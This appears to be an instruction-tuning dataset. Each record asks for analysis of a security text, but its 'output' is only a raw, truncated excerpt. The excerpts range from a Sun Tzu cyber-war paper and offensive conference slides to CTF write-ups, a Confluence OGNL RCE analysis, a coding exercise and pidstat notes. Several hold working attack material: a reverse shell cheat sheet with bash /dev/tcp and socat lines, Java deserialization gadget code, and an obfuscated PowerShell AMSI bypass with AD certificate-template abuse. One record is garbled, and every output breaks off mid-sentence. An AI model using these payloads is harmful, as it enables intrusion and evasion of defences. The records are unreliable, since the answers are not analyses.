{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCCD CoE  February 9, 2011 Sun Tzu and Cyber War Kenneth Geers Naval Criminal Investigative Service (NCIS) Cooperative Cyber Defence Centre of Excellence (CCD COE) Tallinn, Estonia Abstract Cyberspace is a new warfare domain. Computers and the in- formation they contain are prizes to be won during any military conflict. But the intangible nature of cyberspace can make vic- tory, defeat, and battle damage difficult to calculate. Military leaders today are looking for a way to understand and manage this new threat to national security. The most influential mili- tary treatise in history is Sun Tzus Art of War: its recommen- dations are flexible and have been adapted to new circumstanc- es for over 2,500 years. This article examines whether Art of War is flexible enough to encompass cyber warfare. It con- cludes that Sun Tzu provides a useful but far from perfect framework for the management of cyber war, and urges modern military strategists to consider the distinctive aspects of the cyber battlefield. What is Cyber Warfare? The Internet, in a technical sense, is merely a large collection of networked computers. Humans, however, have grown dependent on cyberspace: the flow of information and ideas that they receive from the Internet on a continu- al basis, and immediately incorporate into their lives. As our dependence upon the Internet grows, what hackers think of as their potential attack surface expands. The governance of national security and international conflict is no different: political and military adversaries now routinely use and abuse com- puters in support of strategic and tactical objectives. In the early 1980s, Soviet thinkers referred to this as the Military Technological Revolution (MTR); fol- CCD CoE  February 9, 2011 lowing the 1991 Gulf War, the Pentagons Revolution in Mil- itary Affairs (RMA) was practically a household term (Mish- ra, 2003). Cyber attacks first and foremost exploit the power and reach of the Internet: since the earliest days of t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWeb2Own ATTACKING DESKTOP APPS FROM WEB SECURITY'S PERSPECTIVE Who are we  9aX.TgUh  LYbWYbhKYWifhmPiUbkiEUV  FYaVYf cZ)cdg<L?LYUa  KdYU_Yf cZ RYfcG\\hg+)*1UbX ABL;+)*1=iVU Who are we  9AYUfaYb*  KYWifhmJYgYUfW\\YfbLYbWYbhKYWifhmPiUbkiEUV  KdYU_YfcZ:gUKYWOYgh +)*1 Who are we  9L)a-hcT  KYWifhmJYgYUfW\\YfbLYbWYbhKYWifhmPiUbkiEUV  FYaVYf cZ KmWcjYf KYWifhm LYUa  KdYU_Yf cZ RYfcG\\hg+)*1UbXABL;+)*1=iVU ;UW_fcibX :hhUW_b XYg_hcd Uddg I know about web security I can do little reversing I know nothing about pwning Can I pop up a like people in Pwn2Own? LfUXhcbU Uddg jg \\mVfX Uddg VS DYYdkYV gYWifhm fYUh :hhUW_gifZUWYgcjYfjYk  HdYbYXdcfhg  MJBgW\\YaYg  :dd ZYUhifYg HdYbYX Icfhg O\\mcdYbdcfhg  OYVgYfjYf  cWU XmbUaWkYVghY  :IB WU  =YVib  Hh\\Yfg AckhcUWWYgghch\\YgYdcfhg8  VbXcb)')')')  VbXcbcWU\\cgh  VfckgYfgcifccXZfYbX  ALLI dfchcWc  hcYfUbWYcZYUWcaaUbXg KUaYHfbIcWm !KHI\"  LkcdUYg\\UjYgUaY3  dfchcWc% \\cgh% dcfh  =YZUihVY\\Ujcfgb VfckgYfg same origin different origin send simple requests   send requests with custom headers   get response   =GKJYVbXb Pull Payload bypass SOP rebind.com x.x.x.x rebind.com 127.0.0.1 Attack rebind.com 127.0.0.1 DNS Changed Same Origin =GK JYVbXb dfYfYeighYg  OYVgYfjWYXcYgbchW\\YW_h\\Y\\cghbUaY  NWhakciXkUhibh=GK\\UgW\\UbYX  ;fckgYf\\UgU=GKWUW\\Y <KJ? jg =GKJYVbXb DNS Rebinding CSRF Bypass SOP   Pass hostname check   effective immediately   <UgY ghiXm3 :dcdiUf h\\fXdUfhm dib  OY<\\UhIibFUWHK  DYYdh\\YfYWUYX aYggUY  :ihcfYdmUaYggUY  o  *,)))ghUf(+)))Zcf_g  Khcd aUbhUbYXacbh\\gUc \\hhdg3((h\\iV'Wca(LD__HKYf(OY<\\UhIibFUWHK :hhUW_b kh\\ =GK JYVbXb  ;bXcb*+0')')'*3.+0))  (kYW\\Uhdib(igYf  (kYW\\Uhdib(W\\Uhc  (kYW\\Uhdib(gYbXaYggUY  KhUm cb h\\Y Yj dUY%UhhUW_Yf WUb'''  @YhUZfYbXg  @YhUW\\Uhcg  KYbXUbmaYggUYhcUbmigYf https://xlab.tencent.com/cn/2018/10/23/weixin-cheater-risks/ ?l8  Kh UZZYWhYXVm<KJ?UhhUW_  KYbX Ubm aYggUY hc U_bckbigYf https://github.com/TKkk-iOSer/WeChatPlugin- MacOS/commit/3bf0a352ddbd85250eb00c3f4ed21bb7810b77f4 NSString *hostname = request.headers[@\"Host\"]; NSStri", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBYO-Disaster Why Corporate Wireless Still Sucks! Were just nerds with random ideas and inconsistent results! djwishbone PuNk1nPo0p Why you should stay! What Obtain Clear-Text credentials from any PEAP enabled WPA2-Enterprise Network without cracking a single HASH. Get access to a new set of tools that automates all the attacks for you. How Explore a Functionality Issue discovered with how IOS / OSX devices process MSChapV2. Demonstrate the use of EAP-GTC as the inner authentication mechanism in place of MSChapV2 Association Stuff Radius Access Request EAP Response (Identity) EAP Request (Identity) PEAP Start PEAP Start EAP Type Proposal TLS Tunnel Setup TLS Setup Stuff TLS Setup Stuff Inner EAP MsCHAPv2 Send Identity Again Send Identity Again MsCHAPv2 Challenge MsCHAPv2 Challenge Response w/ Client Challenge Response with Client Challenge Success w/ Challenge Response Success w/ Challenge Response MsCHAPv2 Success MsCHAPv2 Success EAP-TLV Success EAP-TLV Success EAP-TLV Success EAP-TLV Success EAP Success Install Keys on AP EAP Success Finish Connection Stuff Client Responds with MS-ChapV2 hash and Peer Challenge Accept Password Anyway Server Sends TLV-Success No Password in database Peer Challenge does not match Uh, what? Fine, why not Client Responds TLV-Success IPWNER Reject Password Client Checks for Captive Portal Attacker Responds with Captive Portal Server Challenges Client Now that the MITM is complete, we can direct all DNS requests to our captive portal page and capture credentials in Clear-Text! Clear-Text Anyone? What Just Happened? IOS/OSX supplicants do not appear to require MSChapV2 success when connecting to the wireless network. So much for mutual authentication L Bypassing inner authentication Establishing a MITM connection Trapping captive portal request sent by the mobile device by default, and redirect it to our malicious portal User re enters credentials which are now captured in clear-text. Hackers Win again! Responsible Disclosure hahaha, fun", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n探索一切攻破一切 [ Hacker@KCon ] 9/6/2016 3:01:52 PM 0 探索一切攻破一切 [ Hacker@KCon ] 伪基站高级利用技术 彻底攻破短信验证码 Seeker BD4ET 9/6/2016 3:01:54 PM 1 日程  个人简介  手机通信安全概述  LTE伪基站的实现  GSM MITM攻击的实现  短信验证码的脆弱性  安全建议 9/6/2016 3:01:54 PM 2 个人简介  连续创业失败的创业导师  伪天使投资人  某非知名私立大学创办人兼校长  业余时间在本校通信安全实验室打杂  个人微信70772177 9/6/2016 3:02:42 PM 3 9/6/2016 3:01:54 PM Part. 01 手机通信安全概述 4 研究电信网安全漏洞的必要性  大量终端更换或更新补丁成本过高漏洞长期 有效  WIFI与3G/4G蜂窝数据互操作导致的安全风险  2G/3G/4G电信业务互操作带来的安全风险  最弱的环节在WIFI和2G  WIFI之外更有趣 9/6/2016 3:25:26 PM 5 探索一切攻破一切 | [ Hacker@KCon ] LTE手机的脆弱来自  WIFI包交换层面WIFI和蜂窝数据的互操 作  2G网络覆盖和电路交换层面LTE与 2G/3G的互操作 9/6/2016 3:01:54 PM 6 探索一切攻破一切 | [ Hacker@KCon ] 本次话题攻破短信验证码  短信验证码广泛使用是一大隐患  拦截短信成为快速入侵的首选  而且可以低成本实现 9/6/2016 3:01:54 PM 7 探索一切攻破一切 | [ Hacker@KCon ] 短信侦听和拦截当前能做到的程度 1. 联通电信和移动的4G可以通过LTE伪基站来重 定向目标手机到3G和2G 2. 重定向到3G可以利用FemtoCell实现短信侦听和拦 截 3. 重定向到2G CDMA可以利用FemtoCell实现短信侦 听和拦截 4. 重定向到2G GSM 可实现旁路短信侦听通过 MITM还可实现拦截也可通过Race Condition实现 部分拦截 9/6/2016 3:01:54 PM 8 探索一切攻破一切 | [ Hacker@KCon ] 移动通信的演进 cdmaOne GSM TDMA PDC 2G 9.6 - 14.4 kbps CDMA2000 1x GPRS evolved 2G 64144 kbps evolved 3G 384 kbps - 100 Mbps EDGE WCDMA CDMA2000 1x EV/DO 3G 384 kbps - 2 Mbps 4G >1 Gbps HSPA LTE LTE-A 9 9/6/2016 3:01:55 PM 探索一切攻破一切 | [ Hacker@KCon ] 空闲态移动性 小区重选 数据业务移动性 LTE与3G LTE与2G 语音回落CS Fall Back 回落到3G 回落到2G 为了提高用户使用感受用户优选LTE网络驻留但LTE网络覆盖范围小于2G/3G网络因此需要进行 LTE与2G/3G网络的系统间互操作  保证用户在LTE与2G/3G网络之间移动时的数据业务连续性  由于LTE不支持CS域因此CS业务需要回落到2G/3G网络承载 UE在LTE/2G/3G的无线网E-UTRA/GERAN/UTRA之间可以采用多种不同的互操作流程目前中 国移动采用2/4G互操作策略中国联通采用3/4G互操作策略 LTE网络 2G/3G网络 数据业务 空闲态 语音回落 LTE与2G3G的互操作 9/6/2016 3:01:54 PM 10 探索一切攻破一切 | [ Hacker@KCon ] 9/6/2016 3:01:54 PM Part. 02 LTE伪基站的实现 11 LTE伪基站的实现 1. LTE测试环境的搭建 2. LTE RRC重定向的实现 3. LTE小区重选Cell Reselection流程 9/6/2016 3:01:54 PM 12 探索一切攻破一切 | [ Hacker@KCon ] LTE测试环境的搭建 1. 硬件 1) 高性能PC 2) BladeRF或USRP B2x0天线 3) 测试用LTE手机 2. 软件 1) Linux 2) OpenAirInterface 3) 手机路测软件 9/6/2016 3:01:54 PM 13 探索一切攻破一切 | [ Hacker@KCon ] LTE RRC重定向redirectedCarrierInfo 1. redirectedCarrierInfo历史悠久始见于3G通信 标准 2. 应用广泛大量应用于LTE CSFB 3. 通信人所说的RRC重定向其", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Can You See It? Category: Misc., 40 Points ## Description > All we got is this video. > > Can you please help? > > Good Luck! A video was attached. ## Solution Playing the video, we get a quick flickering of background colors. We can extract a portion to a GIF file as a demonstration: ```console root@kali:/media/sf_CTFs/checkpoint/Can_You_See_It/Can_You_See_It# ffmpeg -i Can_You_See_It.mp4 -ss 00:00:00 -to 00:00:03 can_you_see_it.gif ffmpeg version 4.1-1 Copyright (c) 2000-2018 the FFmpeg developers built with gcc 8 (Debian 8.2.0-12) configuration: --prefix=/usr --extra-version=1 --toolchain=hardened --libdir=/usr/lib/x86_64-linux-gnu --incdir=/usr/include/x86_64-linux-gnu --arch=amd64 --enable-gpl --disable-stripping --enable-avresample --disable-filter=resample --enable-avisynth --enable-gnutls --enable-ladspa --enable-libaom --enable-libass --enable-libbluray --enable-libbs2b --enable-libcaca --enable-libcdio --enable-libcodec2 --enable-libflite --enable-libfontconfig --enable-libfreetype --enable-libfribidi --enable-libgme --enable-libgsm --enable-libjack --enable-libmp3lame --enable-libmysofa --enable-libopenjpeg --enable-libopenmpt --enable-libopus --enable-libpulse --enable-librsvg --enable-librubberband --enable-libshine --enable-libsnappy --enable-libsoxr --enable-libspeex --enable-libssh --enable-libtheora --enable-libtwolame --enable-libvidstab --enable-libvorbis --enable-libvpx --enable-libwavpack --enable-libwebp --enable-libx265 --enable-libxml2 --enable-libxvid --enable-libzmq --enable-libzvbi --enable-lv2 --enable-omx --enable-openal --enable-opengl --enable-sdl2 --enable-libdc1394 --enable-libdrm --enable-libiec61883 --enable-chromaprint --enable-frei0r --enable-libx264 --enable-shared libavutil 56. 22.100 / 56. 22.100 libavcodec 58. 35.100 / 58. 35.100 libavformat 58. 20.100 / 58. 20.100 libavdevice 58. 5.100 / 58. 5.100 libavfilter 7. 40.101 / 7. 40.101 libavresample 4. 0. 0 / 4. 0. 0 libswscale 5. 3.100 / 5. 3.100 libswresample 3. 3.100 / 3. 3.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker 对Java反序列化脏数据绕WAF新姿势的补 充 引 相信家都看过回忆飘如雪师傅的篇章Java反序列化数据绕WAF之加量脏数据 在这篇章当中师傅提出了通过将gadget加到集合类型从可以实现添加脏数据这我 发现了个新姿势 灵感也是来源于回忆飘如雪师傅的另篇章的个笔带过的问题上 这原本是师傅想来搞gadget探测的案但是却失败了但本着专研的匠精神我对这个 问题进了深的研究这顺便对这个问题解读 为什么这第个属性反序列化失败仍然触发了URLDNS的整个 过程 顺便这多提嘴为什么之后师傅提出的直接将URLDNS中的HashMap的键值对中将key 或者value任意替换个为需要探测的class就可以呢其实核原因在于是否能触发之后的 hash()函数 这我们调重点来讲好了我们来看看当产 ClassNotFoundException 后最终 在 java.io.ObjectInputStream#readSerialData ,在抛出异常之后他会去继续调  skipCustomData 这有个if判断概是判断当前是否还在块数据当中如果是跳到下个块数据当中每个 块分隔是通过0x78这个字节因为这个字节是个块的结尾 接下来是个switch循环通过下字节来判断这如果都不是则会直接对下段进反序 列化很神奇吧 因此现在我们就能解释为什么当初对于这段代码我们能够成功触发URLDNS的反序列化 过程呢没错就是上这张图他直接对下个块数据继续执反序列化因此对HashMap的 反序列化最终导致URLDNS完整触发 那么为什么这样却能实现需求呢 在这当调了 K key = (K) s.readObject(); 由于类不存在抛出异常之后继续对下 块数据进反序列化最终抛出异常后也不可能继续调下的 value = s.readObjet() 了更别谈通过hash函数最终触发URLDNS因此最终能够成功 List<Object> a = new LinkedList<Object>(); a.add(makeClass(\"TargetClass\")); a.add(new URLDNS.getObject(\"http://test.dnslog.cn\")); HashMap ht = new HashMap(); URL u = new URL(null, url, handler); ht.put(u,我是要探测的gadget); 灵感发 既然在抛出 ClassNotFoundException 后他还会去继续反序列化下块数据并且这是个 相当于while True的东西  那么我们是不是就可以这样疯狂套娃实现垃圾数据呢说就当然家别忘了引 javassist的依赖 简简单单对CommonsBeanutils1来发测试 public class Test { public static Class makeClass(String clazzName) throws Exception{ ClassPool classPool = ClassPool.getDefault(); CtClass ctClass = classPool.makeClass(clazzName); Class clazz = ctClass.toClass(); ctClass.defrost(); return clazz; } 当然这还有个坑就是 家不要直接像这样之前makeClass是返回的Class默认是继承序列化借的这样就导致虽 然也能弹出计算器但只是因为linkedList对的元素循环遍历执readObject的结果不 是本篇提出的通过在ClassNotFoundException利skipCustomData后读取下块数据执反序 列化利的过程 public static void main(String[] args) throws Exception{ PriorityQueue priorityQueue = CB1.getObject(); LinkedList linkedList = new LinkedList(); StringBuilder sb = new StringBuilder(); for(int i=0;i<100;i++){ sb.append(\"e\"); linkedList.add(makeClass(\"woshijiad\"+sb)); } linkedList.add(priorityQueue); ByteArrayOutputStream barr = new ByteArrayOutputStream(); ObjectOutputStream oos = new ObjectOutputStream(barr); ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Reverse Shell Cheat Sheet ## Summary * [Tools](#tools) * [Reverse Shell](#reverse-shell) * [Awk](#awk) * [Automatic Reverse Shell Generator](#revshells) * [Bash TCP](#bash-tcp) * [Bash UDP](#bash-udp) * [C](#c) * [Dart](#dart) * [Golang](#golang) * [Groovy Alternative 1](#groovy-alternative-1) * [Groovy](#groovy) * [Java Alternative 1](#java-alternative-1) * [Java Alternative 2](#java-alternative-2) * [Java](#java) * [Lua](#lua) * [Ncat](#ncat) * [Netcat OpenBsd](#netcat-openbsd) * [Netcat BusyBox](#netcat-busybox) * [Netcat Traditional](#netcat-traditional) * [NodeJS](#nodejs) * [OpenSSL](#openssl) * [Perl](#perl) * [PHP](#php) * [Powershell](#powershell) * [Python](#python) * [Ruby](#ruby) * [Socat](#socat) * [Telnet](#telnet) * [War](#war) * [Meterpreter Shell](#meterpreter-shell) * [Windows Staged reverse TCP](#windows-staged-reverse-tcp) * [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp) * [Linux Staged reverse TCP](#linux-staged-reverse-tcp) * [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp) * [Other platforms](#other-platforms) * [Spawn TTY Shell](#spawn-tty-shell) * [References](#references) ## Tools - [reverse-shell-generator](https://www.revshells.com/) - Hosted Reverse Shell generator ([source](https://github.com/0dayCTF/reverse-shell-generator)) - [revshellgen](https://github.com/t0thkr1s/revshellgen) - CLI Reverse Shell generator ## Reverse Shell ### Bash TCP ```bash bash -i >& /dev/tcp/10.0.0.1/4242 0>&1 0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196 /bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1 ``` ### Bash UDP ```bash Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 4242 ``` Don't forget to check with others shell : sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, bash ### Socat ```powershell user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 ``` ```powershell user@victim$ wget -q https://github.com/andrew-d", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-26134 Confluence Server Data Center OGNL RCE 环境 windows server 2016 + Confluence 7.15.1 下载exe然后直接下一步下一步就行了 web在8090端口8000是rmi端口 安装试用版输入授权码即可 然后配置数据库 需要额外装一个pgsql创建一个名为confluence的数据库 接着选示范站点然后选在confluence中管理用户 配置管理员账号密码然后就安装完成了 分析 官方通告上写了用新的xwork-1.0.3-atlassian-10.jar替换老的xwork-1.0.3-atlassian-8.jar diff补丁发现 移除了 com.opensymphony.xwork.util.TextParseUtil#translateVariables 的调用跟进这个函 数发现这里是ognl表达式执行点 接下来分两部分来写这个洞 1. 正向数据流 2. 绕过沙箱 正向来看 断点打在 com.opensymphony.xwork.ActionChainResult#execute 然后看堆栈 在filter之后由 com.opensymphony.webwork.dispatcher.ServletDispatcher#service 做请求分发 getNameSpace从url中获取最后一个斜线之前的内容 然后走到 com.atlassian.confluence.servlet.ConfluenceServletDispatcher#serviceAction ConfluenceServletDispatcher是ServletDispatcher的子类 在serviceAction中先调用createActionProxy创建一个代理对象然后调用代理对象的execute函数在 代理对象中我们的payload保存至namespace字段 接着到 com.opensymphony.xwork.DefaultActionProxy#execute 这里继续调用 com.opensymphony.xwork.DefaultActionInvocation#invoke 其中this.interceptors是拦截器Confluence默认有28个 然后将自身this传递给 interceptor.intercept(this) 以 com.opensymphony.xwork.interceptor.AroundInterceptor 拦截器为例仍会调用 invocation.invoke() 以此形成迭代循环遍历所有拦截器在某些拦截器中会返回resultCode为notpermitted 在 confluence-7.15.1.jar!\\xwork.xml 中notpermitted对应的type是chain chain对应 com.opensymphony.xwork.ActionChainResult 然后接着执行 this.executeResult() 在executeResult中将this传递给 this.result.execute(this) 而 this.result 由 this.createResult() 创建而来在createResult中会根据resultCode来构建结果 其中notpermitted对应的result类为 com.opensymphony.xwork.ActionChainResult 所以会进入 com.opensymphony.xwork.ActionChainResult#execute 最后在这个地方有ognl从http的servlet path传递给了ognl执行造成rce 沙箱 v7.15开始Confluence在OGNL表达式解析时加入了沙箱设置在 com.opensymphony.xwork.util.TextParseUtil#translateVariables 调用ognl时使用findValue findValue中存在安全校验 黑名单 sun.misc.Unsafe classLoader java.lang.System java.lang.ThreadGroup com.opensymphony.xwork.ActionContext java.lang.Compiler com.atlassian.applinks.api.ApplicationLinkRequestFactory java.lang.Thread com.atlassian.core.util.ClassLoaderUtils java.lang.ProcessBuilder ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 5. 替换空格 ## 题目链接 [牛客网](https://www.nowcoder.com/practice/0e26e5551f2b489b9f58bc83aa4b6c68?tpId=13&tqId=11155&tab=answerKey&from=cyc_github) ## 题目描述 将一个字符串中的空格替换成 \"%20\" ```text Input: \"A B\" Output: \"A%20B\" ``` ## 解题思路 ① 在字符串尾部填充任意字符使得字符串的长度等于替换之后的长度因为一个空格要替换成三个字符%20所以当遍历到一个空格时需要在尾部填充两个任意字符 ② 令 P1 指向字符串原来的末尾位置P2 指向字符串现在的末尾位置P1 和 P2 从后向前遍历当 P1 遍历到一个空格时就需要令 P2 指向的位置依次填充 02%注意是逆序的否则就填充上 P1 指向字符的值从后向前遍是为了在改变 P2 所指向的内容时不会影响到 P1 遍历原来字符串的内容 ③ 当 P2 遇到 P1 时P2 \\<= P1或者遍历结束P1 \\< 0退出 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/f7c1fea2-c1e7-4d31-94b5-0d9df85e093c.gif\" width=\"350px\"> </div><br> ```java public String replaceSpace(StringBuffer str) { int P1 = str.length() - 1; for (int i = 0; i <= P1; i++) if (str.charAt(i) == ' ') str.append(\" \"); int P2 = str.length() - 1; while (P1 >= 0 && P2 > P1) { char c = str.charAt(P1--); if (c == ' ') { str.setCharAt(P2--, '0'); str.setCharAt(P2--, '2'); str.setCharAt(P2--, '%'); } else { str.setCharAt(P2--, c); } } return str.toString(); } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n针对域证书服务的攻击4- ESC4 0x00 前言 ESC4叫做Vulnerable Certificate Template Access Control其实是弱ACL的证书模板会导致域提权 写完ESC1-ESC3ESC4由于白皮书没有比较详细的过程并且我本地域环境出了点问题就搁置到现 在但是国庆的时候看见国外的研究员发布了一篇关于ESC4的文章https://github.com/daem0nc0 re/Abusing_Weak_ACL_on_Certificate_Templates减少了我很多工作量我们知道每个模板都有自己 的权限控制策略ESC4利用的就是这个权限控制不严格例如domain users组的用户具有写入权 限这样它就可以修改模板的配置为可以满足提权的配置样式比如修改成ESC1的配置言归正传我 们还是先来搭建测试环境 0x01 危害环境搭建 我们基于\"基本EFS\"配置ESC4的危害模板修改模板名称为ESC4其他配置如下 开启CA证书管理程序批准 开启授权签名 配置Domain Users有可写权限危害点 其他保持默认 Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-11 No. 1 / 9 - Welcome to www.red-team.cn Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-11 No. 2 / 9 - Welcome to www.red-team.cn 好了配置就这么简单其实重要的是domain users具有写入权限其他的配置只是模仿常见情况然 后记得发布证书模板 0x02 利用 我还是使用Certify.exe 来发现危害 Certify.exe find /vulnerable Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-11 No. 3 / 9 - Welcome to www.red-team.cn 我们主要利用的是domain users具有WriteDacl的权限来修改模板的配置让这个模板满足ESC1的要 求 模板注册权限 我们现在只有模板的写入权限没有模板的注册权限我们来给模板加注册权限我们使用powerview 来操作直接加载powerview可能会被AMSI拦截 这个难不倒我们读过bypass amsi的前世今生系列的同学应该秒过我们直接用一句话关闭 AMSI 加注册权限 $a=\"5492868772801748688168747280728187173688878280688776828\" $b=\"1173680867656877679866880867644817687416876797271\" $c=[string](0..37|%{[char][int](29+($a+$b).substring(($_*2),2))})-replace \" \" $d=[Ref].Assembly.GetType($c) $e=[string](38..51|%{[char][int](29+($a+$b).substring(($_*2),2))})-replace \" \" $f=$d.GetField($e,'NonPublic,Static') $f.SetValue($null,$true) Produced by AttackTeamFamily - Author: L.N. - Date: 2021-10-11 No. 4 / 9 - Welcome to www.red-team.cn 我们使用Certify.exe来验证下是否有注册权限 禁用CA证书管理程序批准 虽然这个是我们人工配置开启的是为了模拟常见情况我们这会儿把这个配置关闭同样使用 powerview Add-DomainObjectAcl -TargetIdentity ESC4 -PrincipalIdentity \"Domain Users\" - RightsGUID \"0e10c968-78fb-11d2-90d4-00c04f79dc55\" -TargetSearchBase \"LDAP://CN=Configuration,DC=redteamlab,DC=com\" -Verbose Set-DomainObject -SearchBase \"CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=redteamlab,DC=com\" -Identity ESC4 -X", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Neo (Crypto, 200p) ###ENG [PL](#pl-version) The task shows a webpage with Neo going to Oracle. There is a html form with some base64 encoded data. Decoding gives some random 80 bytes blob. Once every few seconds the data changes, most likely there is embedded timestamp. If we provide our own base64 data in the form the page says that `AES decryption failed`. This all points to `Padding Oracle Attack` - vulnerability which allows us to decode n-1 blocks of block cipher ciphertext in CBC mode. In CBC mode the plaintext is XORed with previous block ciphertext. This means that a change in a single byte of ciphertext will cause all bytes on corresponding positions in next blocks to be decrypted incorrectly, since they will be XORed with a wrong value. What we want to achieve in the attack is to exploit how decryption handles padding. In PKCS7 padding the last byte of decrypted data defines padding. It's a number which says how many padding bytes there are and also what value each of them holds. For example if there is 3 byte padding the 16 byte block would be `XXXXXXXXXXXXX0x30x030x3`. If the padding is not formed correctly we will get decryption error, since it means the data were tamered with. What we want to achieve with our attack is to try to guess the plaintext byte by attempting to \"transform\" it into padding. Let's assume we have 2 blocks of ciphertext. If we change the last byte of the first block this value will be XORed with decrypted last byte of the second block. We changed it so it won't get the \"proper\" value anymore, so the padding will be broken for sure... unless the value will become `0x1`, which is a correct padding indicator! If the value became `0x1` this means that `our_changed_byte XOR decrypted_byte = 0x1` and this means that `decrypted_byte = our_changed_byte XOR 0x1`! So if for a certain value we won't get decryption error this means we successfully decoded the last byte of ciphertext. Now we can extend this to more bytes - to recover the by", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npidstat === 监控进程的系统资源占用情况 ## 说明 **pidstat**是sysstat工具的一个命令用于监控全部或指定进程的cpu内存线程设备IO等系统资源的占用情况 pidstat首次运行时显示自系统启动开始的各项统计信息之后运行pidstat将显示自上次运行该命令以后的统计信息用户可以通过指定统计的次数和时间来获得所需的统计信息 ### 语法 ```shell pidstat [ 选项 ] [ <时间间隔> ] [ <次数> ] ``` #### 选项 - u默认的参数显示各个进程的cpu使用统计 - r显示各个进程的内存使用统计 - d显示各个进程的IO使用情况 - w显示每个进程的上下文切换情况 - t显示到线程的统计信息 - p指定进程号 - T { TASK | CHILD | ALL } 这个选项指定了pidstat监控的TASK表示报告独立的taskCHILD关键字表示报告进程下所有线程统计信息ALL表示报告独立的task和task下面的所有线程 注意task和子线程的全局的统计信息和pidstat选项无关这些统计信息不会对应到当前的统计间隔这些统计信息只有在子线程kill或者完成的时候才会被收集 - V版本号 - h在一行上显示了所有活动这样其他程序可以容易解析 - I在SMP环境表示任务的CPU使用率/内核数量 - l显示命令名和所有参数 ### 实例 #### 查看所有进程的CPU使用情况 ```shell # pidstat -u -p ALL 11:04:06 AM UID PID %usr %system %guest %CPU CPU Command 11:04:06 AM 0 1 0.03 0.05 0.00 0.08 20 systemd 11:04:06 AM 0 2 0.00 0.00 0.00 0.00 28 kthreadd 11:04:06 AM 0 3 0.00 0.00 0.00 0.00 0 rcu_gp 11:04:06 AM 0 4 0.00 0.00 0.00 0.00 0 rcu_par_gp 11:04:06 AM 0 6 0.00 0.00 0.00 0.00 0 kworker/0:0H-kblockd 11:04:06 AM 0 9 0.00 0.00 0.00 0.00 38 mm_percpu_wq 11:04:06 AM 0 10 0.00 0.01 0.00 0.01 0 ksoftirqd/0 11:04:06 AM 0 11 0.00 0.23 0.00 0.23 15 rcu_sched 11:04:06 AM 0 12 0.00 0.00 0.00 0.00 0 migration/0 11:04:06 AM 0 14 0.00 0.00 0.00 0.00 0 cpuhp/0 11:04:06 AM 0 15 0.00 0.00 0.00 0.00 1 cpuhp/1 ... ``` 表头字段说明 - PID进程ID - %usr进程在用户空间占用cpu的百分比 - %system进程在内核空间占用cpu的百分比 - %guest进程在虚拟机占用cpu的百分比 - %CPU进程占用cpu的百分比 - CPU处理进程的cpu编号 - Command当前进程对应的命令 #### 查看所有进程的内存使用情况 ```shell # pidstat -r 11:10:35 AM UID PID minflt/s majflt/s VSZ RSS %MEM Command 11:10:35 AM 0 1 7.24 0.05 191312 4208 0.01 systemd 11:10:35 AM 0 1407 2.02 0.09 39316 9016 0.03 systemd-journal 11:10:35 AM 0 1442 0.03 0.00 190380 1080 0.00 lvmetad 11:10:35 AM 0 1457 0.46 0.00 46252 1560 0.00 systemd-udevd 11:10:35 AM 0 2429 0.11 0.00 163620 9472 0.03 sshd 11:10:35 AM 992 2446 0.02 0.00 8588 996 0.00 lsmd 11:10:35 AM 0 2447 0.05 0.00 90572 1468 0.00 rngd 11:10:35 AM 0 2448 0.15 0.02 451272 3520 0.01 udisksd 11:10:35 AM 0 2449 0.18 0.02 396488 1948 0.01 accounts-daemon 1", "category": "text_analysis", "source": "security_papers"}
